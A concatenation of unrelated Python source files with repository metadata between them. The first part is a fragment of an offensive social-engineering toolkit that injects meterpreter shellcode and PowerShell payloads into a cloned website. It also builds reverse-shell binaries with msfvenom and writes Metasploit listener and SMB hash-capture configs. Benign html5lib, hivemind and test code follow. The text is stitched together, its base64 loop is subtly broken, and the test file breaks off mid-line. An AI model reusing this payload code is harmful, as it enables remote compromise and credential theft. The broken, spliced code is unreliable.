# base64 1
data = str(data)
data = base64.b64encode(b'data')
# encode it again for the fun 2
data = base64.b64encode(b'data')
# again 3
data = base64.b64encode(b'data')
# again 4
data = base64.b64encode(b'data')
# again 5
data = base64.b64encode(b'data')
# again 6
data = base64.b64encode(b'data')
# again 7
data = base64.b64encode(b'data')
# again 8
data = base64.b64encode(b'data')
# 9
data = base64.b64encode(b'data')
# 10
data = base64.b64encode(b'data')
# last one
data = base64.b64encode(b'data')
#
filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w")
filewrite.write(str(data))
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# here we obfuscate the binary a little bit
random_string = generate_random_string(3, 3).upper()
if choice1 == "shellcode/alphanum":
fileopen = open("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb").read()
if choice1 == "shellcode/pyinject":
fileopen = open("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb").read()
if choice1 == "shellcode/multipyinject":
fileopen = open("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb").read()
# write out the payload
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":
filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(fileopen)
filewrite.close()
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
# we need to read in the old index.html file because its
# already generated, need to present the alphanum to it
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r")
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace(
'param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(b'secret')
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
filewrite.write(str(data))
# close file
filewrite.close()
# rename file
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
# UPDATE THE SET CONFIG OPTIONS
update_options("PORT=1")
# here we specify the payload name thats stored later on
choice1 = choice9
# write out the payload for powershell injection to pick it up if used
filewrite = open(userconfigpath + "metasploit.payload", "w")
filewrite.write(choice1)
filewrite.close()
# import if on
setshell_counter = 0
powershell = check_config("POWERSHELL_INJECTION=")
if powershell.lower() == "on" or powershell.lower() == "yes":
if choice1 == "set/reverse_shell" or choice1 == "RATTE":
print_status("Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
setshell_counter = 1
if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
if choice1 != "cmd/multi":
try: core.module_reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (userconfigpath)):
fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r")
x86 = fileopen1.read()
x86 = "powershell -ec " + x86
# if we specified option cmd/multi which allows us to enter commands in instead and execute them many times
if choice1 == "cmd/multi":
print_status("This section will allow you to specify your own .txt file which can contain one more multiple commands. In order to execute multiple commands you would enter them in for example: cmd1,cmd2,cmd3,cmd4. In the background the Java Applet will enter in cmd /c 'yourcommands here'. You need to provide a path to the txt file that contains all of your commands or payloads split by commas. If just one, then just use no ,.")
filepath = raw_input("\nEnter the path to the file that contains commands: ")
while 1:
if not os.path.isfile(filepath):
filepath = raw_input("[!] File not found.\nEnter the path again and make sure file is there: ")
if os.path.isfile(filepath): break
x86 = open(filepath, "r").read()
print_status("Multi-command payload delivery for Java Applet selected.")
print_status("Embedding commands into Java Applet parameters...")
print_status("Note that these will be base64-encoded once, regardless of the payload..")
fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# encode once, will need to decode later
x86 = x86.encode("utf-8")
base_encode = base64.b64encode(x86)
data = data.replace('param name="5" value=""', 'param name="5" value="%s"' % (base_encode))
data = data.replace('param name="6" value=""', 'param name="6" value="%s"' % (base_encode))
if choice1 == "cmd/multi": data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if choice1 != "cmd/multi":
# check if we don't want to deploy binaries
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if deploy_binaries.lower() == "y" or deploy_binaries.lower() == "yes":
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait()
# here we specify the binary to deploy if we are using ones that are
# required to drop binaries
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi":
fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# check if we don't want to deploy binaries
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell":
attack_vector = "set_payload"
# if we have the java attack, multiattack java, and the set interactive
# shell
if attack_vector == "java" or multiattack_java == "on":
if attack_vector != "set_payload":
# pull in the ports from config
port1 = check_config("OSX_REVERSE_PORT=")
# if we are using the multiattack, there will be port
# conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
# deploy nix and linux binaries
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
# if we are using a custom linux/osx payload
if check_config("CUSTOM_LINUX_OSX_PAYLOAD=").lower() == "on":
osx_path = raw_input(
"Enter the path for the custom OSX payload (blank for nothing): ")
lin_path = raw_input(
"Enter the path for the custom Linux payload (blank for nothing): ")
print_status(
"Copying custom payloads into proper directory structure.")
# if we didn't specify blank
if osx_path != "":
while 1:
if not os.path.isfile(osx_path):
print_error(
"File not found, enter the path again.")
osx_path = raw_input(
"Enter the path for the custom OSX payload (blank for nothing): ")
if os.path.isfile(osx_path):
break
if osx_path != "":
# copy the payload
shutil.copyfile(osx_path, userconfigpath + "mac.bin")
# if linux payload
if lin_path != "":
while 1:
if not os.path.isfile(lin_path):
print_error(
"File not found, enter the path again.")
lin_path = raw_input(
"Enter the path for the custom Linux payload (blank for nothing): ")
if os.path.isfile(lin_path):
break
if lin_path != "":
# copy the payload
shutil.copyfile(lin_path, userconfigpath + "nix.bin")
else:
port2 = check_config("LINUX_REVERSE_PORT=")
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX=" + str(port1) + "\n")
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
multiattack.write("LINUX=" + str(port2) + "\n")
multiattack.write("LINUXPAYLOAD=%s\n" % (linuxpayload))
osxcheck = check_options("MAC.BIN=")
linuxcheck = check_options("NIX.BIN=")
shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck))
shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck))
# try block here
try:
# if they want a listener, start here
if os.path.isfile("%s/meta_config" % (userconfigpath)):
# if its already created
filewrite = open("%s/meta_config" % (userconfigpath), "a")
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
# if we need to create it
filewrite = open("%s/meta_config" % (userconfigpath), "w")
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/multi_meta" % (userconfigpath)):
port_check = check_ports("%s/meta_config" % (userconfigpath), choice3)
if port_check == False:
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + choice1 + "\n")
filewrite.write("set LHOST " + ipaddr + "\n")
if flag == 0:
filewrite.write("set LPORT " + choice3 + "\n")
filewrite.write("set EnableStageEncoding %s\n" %
(stage_encoding))
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close()
filewrite.write("exploit -j\r\n\r\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n")
# if only doing payloadgen then close the stuff up
if payloadgen == "solo":
filewrite.close()
# Define linux and OSX payloads
if payloadgen == "regular":
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
filewrite.write("use exploit/multi/handler\n")
filewrite.write(
"set PAYLOAD osx/x86/shell_reverse_tcp" + "\n")
filewrite.write("set LHOST " + choice2 + "\n")
filewrite.write("set LPORT " + port1 + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write(
"set PAYLOAD linux/x86/shell/reverse_tcp" + "\n")
filewrite.write("set LHOST " + choice2 + "\n")
filewrite.write("set LPORT " + port2 + "\n")
if linux_meterpreter_multi == "ON":
multiwrite = open(
userconfigpath + "lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
except Exception as e:
log(e)
print_error("ERROR:Something went wrong:")
print(bcolors.RED + "ERROR:" + str(e) + bcolors.ENDC)
# Catch all errors
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
# finish closing up the remenant files
if attack_vector == "multiattack":
multiattack.close()
if os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open("%s/payload.options" % (userconfigpath), "w")
filewrite.write(choice1 + " " + ipaddr + " " + choice3)
filewrite.close()
if choice1 == "set/reverse_shell":
if os.path.isfile(userconfigpath + "meta_config"):
os.remove(userconfigpath + "meta_config")
| 50.779319 | 459 | 0.520686 |
1bb7ad7d12ca47f72c3d6e1be3d308044cde6cc1 | 189 | py | Python | text/is_palindrome.py | mouckatron/Martyr2MegaProjectList | 96cea1ea409a50626a2cb91d750f99e9bdf95464 | [
"MIT"
] | null | null | null | text/is_palindrome.py | mouckatron/Martyr2MegaProjectList | 96cea1ea409a50626a2cb91d750f99e9bdf95464 | [
"MIT"
] | null | null | null | text/is_palindrome.py | mouckatron/Martyr2MegaProjectList | 96cea1ea409a50626a2cb91d750f99e9bdf95464 | [
"MIT"
] | null | null | null | #! /usr/bin/python2.7
import os
import sys
data = sys.stdin.read().strip()
if data == data[::-1]:
sys.exit(0) # 0 is true or no failure
else:
sys.exit(1) # 1 is false or failure
| 15.75 | 41 | 0.624339 |
e23288474fc6445e48a0be0e2a554416af5431b6 | 3,406 | py | Python | env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py | lindamar/ecclesi | cad07fc78daf6facd1b74cc1cb1872aaf4771fa2 | [
"MIT"
] | 674 | 2015-11-06T04:22:47.000Z | 2022-02-26T17:31:43.000Z | env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py | lindamar/ecclesi | cad07fc78daf6facd1b74cc1cb1872aaf4771fa2 | [
"MIT"
] | 3,243 | 2017-02-07T15:30:01.000Z | 2022-03-31T16:42:19.000Z | env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py | lindamar/ecclesi | cad07fc78daf6facd1b74cc1cb1872aaf4771fa2 | [
"MIT"
] | 210 | 2017-09-01T00:10:08.000Z | 2022-03-19T18:05:12.000Z | """A collection of modules for building different kinds of tree from
HTML documents.
To create a treebuilder for a new type of tree, you need to do
implement several things:
1) A set of classes for various types of elements: Document, Doctype,
Comment, Element. These must implement the interface of
_base.treebuilders.Node (although comment nodes have a different
signature for their constructor, see treebuilders.etree.Comment)
Textual content may also be implemented as another node type, or not, as
your tree implementation requires.
2) A treebuilder object (called TreeBuilder by convention) that
inherits from treebuilders._base.TreeBuilder. This has 4 required attributes:
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
It also has one required method:
getDocument - Returns the root node of the complete document tree
3) If you wish to run the unit tests, you must also create a
testSerializer method on your treebuilder which accepts a node and
returns a string containing Node and its children serialized according
to the format used in the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from .._utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - A generic builder for DOM implementations, defaulting to
a xml.dom.minidom based implementation.
"etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to
xml.etree.cElementTree if available and
xml.etree.ElementTree if not.
"lxml" - A etree-based builder for lxml.etree, handling
limitations of lxml's implementation.
implementation - (Currently applies to the "etree" and "dom" tree types). A
module implementing the tree type e.g.
xml.etree.ElementTree or xml.etree.cElementTree."""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
| 44.233766 | 79 | 0.685555 |
a67dba6522c8a61453b32bc3ca21f85bc77aee93 | 10,764 | py | Python | hivemind/server/expert_backend.py | Vsevolod-pl/hivemind | 0300cfd91adeb14d91d9659a98221628f9b775b9 | [
"MIT"
] | 11 | 2021-06-21T19:56:01.000Z | 2021-12-22T09:06:09.000Z | hivemind/server/expert_backend.py | Vsevolod-pl/hivemind | 0300cfd91adeb14d91d9659a98221628f9b775b9 | [
"MIT"
] | null | null | null | hivemind/server/expert_backend.py | Vsevolod-pl/hivemind | 0300cfd91adeb14d91d9659a98221628f9b775b9 | [
"MIT"
] | null | null | null | from typing import Dict, Sequence, Any, Tuple, Union, Callable
import torch
from torch import nn
from hivemind.server.task_pool import TaskPool
from hivemind.utils import BatchTensorDescriptor, DUMMY_BATCH_SIZE
from hivemind.utils.logging import get_logger
from hivemind.utils.nested import nested_flatten, nested_pack, nested_compare, nested_map
logger = get_logger(__name__)
class ExpertBackend:
"""
ExpertBackend is a wrapper around torch module that allows it to run tasks asynchronously with Runtime
By default, ExpertBackend handles three types of requests:
- forward - receive inputs and compute outputs. Concurrent requests will be batched for better GPU utilization.
- backward - receive gradients w.r.t. outputs, compute gradients w.r.t. inputs and **update expert**. Also batched.
- get_info - return expert metadata. Not batched.
:param expert: nn.Module to be wrapped into a backend. Arbitrary pytorch module with a few limitations:
- Experts must always receive the same set of args and kwargs and produce output tensors of same type
- All args, kwargs and outputs must be **tensors** where 0-th dimension represents to batch size
- We recommend using experts that are ~invariant to the order in which they process batches
- Using randomness (e.g. Dropout) leads to different samples at forward and backward. If you want consistency,
you should explicitly register these random variables as model inputs or outputs.
See hivemind.utils.custom_layers.DeterministicDropout for an example
:param optimizer: torch optimizer to be applied on every backward call
:param scheduler: a function to create the learning rate scheduler for the expert
:param args_schema: description of positional arguments to expert.forward, list of BatchTensorProto
:param kwargs_schema: description of keyword arguments to expert.forward, dict of BatchTensorProto
:param outputs_schema: description of outputs from expert.forward, nested structure of BatchTensorProto
:param num_warmup_steps: the number of warmup steps for LR schedule
:param num_total_steps: the total number of steps for LR schedule
:param clip_grad_norm: maximum gradient norm used for clipping
:param kwargs: extra parameters to be forwarded into TaskPool.__init__
"""
def __init__(self, name: str, expert: nn.Module, optimizer: torch.optim.Optimizer, *,
scheduler: Callable = None,
args_schema: Tuple[BatchTensorDescriptor, ...] = None,
kwargs_schema: Dict[str, BatchTensorDescriptor] = None,
outputs_schema: Union[BatchTensorDescriptor, Tuple[BatchTensorDescriptor, ...]] = None,
num_warmup_steps: int = None, num_total_steps: int = None, clip_grad_norm: float = None,
**kwargs):
super().__init__()
self.expert, self.optimizer, self.name = expert, optimizer, name
if scheduler is None:
self.scheduler = None
else:
assert optimizer is not None and num_warmup_steps is not None and num_total_steps is not None
self.scheduler = scheduler(self.optimizer, num_warmup_steps, num_total_steps)
self.clip_grad_norm = clip_grad_norm
self.args_schema = args_schema = tuple(args_schema or ())
self.kwargs_schema = kwargs_schema = dict(kwargs_schema or {})
assert args_schema or kwargs_schema, "expert must receive at least one positional or keyword input." \
" Did you forget to provide args_schema/kwargs_schema?"
if outputs_schema is None:
# run expert once to get outputs schema
dummy_args = tuple(sample.make_empty(DUMMY_BATCH_SIZE) for sample in args_schema)
dummy_kwargs = {key: sample.make_empty(DUMMY_BATCH_SIZE) for key, sample in kwargs_schema.items()}
dummy_outputs = self.expert(*dummy_args, **dummy_kwargs)
outputs_schema = nested_map(BatchTensorDescriptor.from_tensor, dummy_outputs)
self.forward_schema = (self.args_schema, self.kwargs_schema) # inputs for forward
self.outputs_schema = outputs_schema # outputs from forward
self.backward_schema = (self.forward_schema, self.outputs_schema) # inputs to backward
self.grad_inputs_schema = self.forward_schema # outputs from backward
self.forward_pool = TaskPool(self.forward, name=f'{self.name}_forward', **kwargs)
self.backward_pool = TaskPool(self.backward, name=f'{self.name}_backward', **kwargs)
self.update_count = 0
self.examples_processed = 0
def forward(self, *inputs: torch.Tensor) -> Tuple[torch.Tensor, ...]:
"""
Apply forward pass to an aggregated batch of requests. Used by Runtime, do not call this manually;
To submit a request for asynchronous processing, please use ``ExpertBackend.forward_pool.submit_task``.
Subclassing:
This method receives a sequence of torch tensors following ``nested_flatten(self.forward_schema)``;
It should return gradients w.r.t. inputs that follow ``nested_flatten(self.outputs_schema)``;
.. todo we handle layer states (e.g. batchnorm stats) incorrectly, updating them twice.
.. For now, either register all buffers as outputs or avoid stateful experts
"""
args, kwargs = nested_pack(inputs, structure=self.forward_schema)
if args[0].shape[0] == 0:
raise RuntimeError("Batch should contain more than 0 samples")
with torch.no_grad():
outputs = self.expert(*args, **kwargs)
# Note: TaskPool requires function to accept and return a flat tuple of values, we pack/unpack it on client side
return tuple(nested_flatten(outputs))
def backward(self, *inputs: torch.Tensor) -> Tuple[torch.Tensor, ...]:
"""
Apply backward pass to an aggregated batch of requests. Used by Runtime, do not call this manually
To submit a request for asynchronous processing, please use ``ExpertBackend.backward_pool.submit_task``.
Subclassing:
This method receives a sequence of torch tensors following ``nested_flatten(self.backward_schema)``;
It should return gradients w.r.t. inputs that follow ``nested_flatten(self.forward_schema)``;
Runtime doesn't guarantee that backward will be performed in the same order and for the same data
as forward, so we recommend stateless backward pass that re-runs expert forward pass inside backward.
.. todo correct state handling (see forward)
Please make sure to call ``ExpertBackend.apply_gradients`` here, otherwise the expert will not train
"""
(args, kwargs), grad_outputs = nested_pack(inputs, structure=self.backward_schema)
with torch.enable_grad():
args = [tensor.detach().requires_grad_(True) if tensor.dtype in (torch.half, torch.float, torch.double)
else tensor.detach() for tensor in args]
kwargs = {input_key: (tensor.detach().requires_grad_(True)
if tensor.is_floating_point() else tensor.detach())
for input_key, tensor in kwargs.items()}
batch_size = args[0].size(0)
outputs = self.expert(*args, **kwargs)
assert nested_compare(outputs, grad_outputs), "outputs and grad_outputs must have the same structure"
outputs_flat = tuple(nested_flatten(outputs))
grad_outputs_flat = tuple(map(
lambda grad, out: grad.to(device=out.device, dtype=out.dtype, non_blocking=True),
nested_flatten(grad_outputs), outputs_flat))
torch.autograd.backward(outputs_flat, grad_tensors=grad_outputs_flat,
create_graph=False, retain_graph=False)
self.apply_gradients(batch_size)
return tuple(x.grad if isinstance(x.grad, torch.Tensor) else torch.zeros_like(x)
for x in nested_flatten((args, kwargs)))
def apply_gradients(self, batch_size) -> None:
"""
Train the expert for one step. This method is called by ``ExpertBackend.backward`` after computing gradients.
"""
if self.clip_grad_norm is not None:
torch.nn.utils.clip_grad_norm_(self.expert.parameters(), self.clip_grad_norm)
self.optimizer.step()
self.optimizer.zero_grad()
if self.scheduler is not None:
self.scheduler.step()
self.update_count += 1
self.examples_processed += batch_size
def get_stats(self) -> Dict:
"""
Return current expert training statistics (number of updates, number of processed examples after last optimizer step)
"""
return {
'updates': self.update_count,
'examples_processed': self.examples_processed
}
def get_full_state(self) -> Dict:
"""
Return the current state of the expert (including batch processing statistics)
"""
full_state = {
'stats': self.get_stats(),
'model': self.expert.state_dict(),
'optimizer': self.optimizer.state_dict(),
'scheduler': {} if self.scheduler is None else self.scheduler.state_dict()
}
return full_state
def load_full_state(self, state_dict: Dict):
if 'stats' in state_dict:
self.update_count = state_dict['stats']['updates']
self.examples_processed = state_dict['stats']['examples_processed']
else:
logger.warning(f'Batch processing stats missing for expert {self.name}')
self.expert.load_state_dict(state_dict['model'])
if 'optimizer' in state_dict:
self.optimizer.load_state_dict(state_dict['optimizer'])
else:
logger.warning(f'Optimizer state missing for expert {self.name}')
if self.scheduler is not None and 'scheduler' in state_dict:
self.scheduler.load_state_dict(state_dict['scheduler'])
else:
logger.warning(f'Learning rate scheduler state missing for expert {self.name}')
def get_info(self) -> Dict[str, Any]:
""" Get expert parameters and stats. Used by RemoteExpert to check shapes and for DMoE orchestration. """
return dict(forward_schema=self.forward_schema, outputs_schema=self.outputs_schema,
keyword_names=tuple(self.kwargs_schema.keys()))
def get_pools(self) -> Sequence[TaskPool]:
""" return all pools that should be processed by ``Runtime`` """
return self.forward_pool, self.backward_pool
| 50.065116 | 125 | 0.678558 |
9d6dcaec00f412707cca21822d9dcd4cf71710f3 | 40,498 | py | Python | sos_trades_core/tests/l0_test_36_simple_multi_scenario.py | os-climate/sostrades-core | bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9 | [
"Apache-2.0"
] | 8 | 2022-01-10T14:44:28.000Z | 2022-03-31T08:57:14.000Z | sos_trades_core/tests/l0_test_36_simple_multi_scenario.py | os-climate/sostrades-core | bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9 | [
"Apache-2.0"
] | null | null | null | sos_trades_core/tests/l0_test_36_simple_multi_scenario.py | os-climate/sostrades-core | bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9 | [
"Apache-2.0"
] | 1 | 2022-02-21T14:51:45.000Z | 2022-02-21T14:51:45.000Z | '''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
'''
import unittest
from time import sleep
from shutil import rmtree
from pathlib import Path
from os.path import join
import pandas as pd
import numpy as np
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.execution_engine.sos_simple_multi_scenario import SoSSimpleMultiScenario
from sos_trades_core.execution_engine.scatter_data import SoSScatterData
from sos_trades_core.execution_engine.sos_discipline_scatter import SoSDisciplineScatter
from tempfile import gettempdir
from sos_trades_core.tools.rw.load_dump_dm_data import DirectLoadDump
from sos_trades_core.study_manager.base_study_manager import BaseStudyManager
class TestSimpleMultiScenario(unittest.TestCase):
"""
SoSSimpleMultiScenario test class
"""
def setUp(self):
'''
Initialize third data needed for testing
'''
self.dirs_to_del = []
self.namespace = 'MyCase'
self.study_name = f'{self.namespace}'
self.repo = 'sos_trades_core.sos_processes.test'
self.base_path = 'sos_trades_core.sos_wrapping.test_discs'
self.exec_eng = ExecutionEngine(self.namespace)
self.factory = self.exec_eng.factory
self.root_dir = gettempdir()
def tearDown(self):
for dir_to_del in self.dirs_to_del:
sleep(0.5)
if Path(dir_to_del).is_dir():
rmtree(dir_to_del)
sleep(0.5)
def test_01_multi_scenario_of_scatter(self):
# scatter build map
ac_map = {'input_name': 'name_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac',
'gather_ns': 'ns_scenario',
'ns_to_update': ['ns_data_ac']}
self.exec_eng.smaps_manager.add_build_map('name_list', ac_map)
# scenario build map
scenario_map = {'input_name': 'scenario_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'scenario_name',
'scatter_ns': 'ns_scenario',
'gather_ns': 'ns_scatter_scenario',
'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']}
self.exec_eng.smaps_manager.add_build_map(
'scenario_list', scenario_map)
# shared namespace
self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase')
self.exec_eng.ns_manager.add_ns(
'ns_scatter_scenario', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_disc3', 'MyCase.multi_scenarios.Disc3')
self.exec_eng.ns_manager.add_ns(
'ns_out_disc3', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_data_ac', 'MyCase')
# instantiate factory # get instantiator from Discipline class
builder_list = self.factory.get_builder_from_process(repo=self.repo,
mod_id='test_disc1_scenario')
scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list(
'name_list', builder_list=builder_list, autogather=True)
mod_list = f'{self.base_path}.disc3_scenario.Disc3'
disc3_builder = self.exec_eng.factory.get_builder_from_module(
'Disc3', mod_list)
scatter_list.append(disc3_builder)
multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder(
'multi_scenarios', 'scenario_list', scatter_list, autogather=True, gather_node='Post-processing')
self.exec_eng.factory.set_builders_to_coupling_builder(
multi_scenarios)
self.exec_eng.configure()
self.exec_eng.display_treeview_nodes()
dict_values = {
f'{self.study_name}.multi_scenarios.trade_variables': {'x': 'float'}}
self.exec_eng.load_study_from_input_dict(dict_values)
scenario_df = pd.DataFrame(columns=['scenario_name', 'x'])
self.assertTrue(scenario_df.equals(
self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')))
x1 = 2.
x2 = 4.
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x'])
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_df = pd.DataFrame([['scenario_1', x1], ['scenario_2', x2]], columns=[
'scenario_name', 'x'])
print(scenario_df)
print(self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df'))
self.assertTrue(scenario_df.equals(
self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')))
dict_values = {self.study_name +
'.multi_scenarios.name_list': ['name_1', 'name_2']}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
private_val = {}
scenario_list = ['scenario_1', 'scenario_2']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
private_val[self.study_name + '.name_1.a'] = a1
private_val[self.study_name + '.name_2.a'] = a2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
private_val[self.study_name +
'.multi_scenarios.scenario_1.Disc3.z'] = 1.2
private_val[self.study_name +
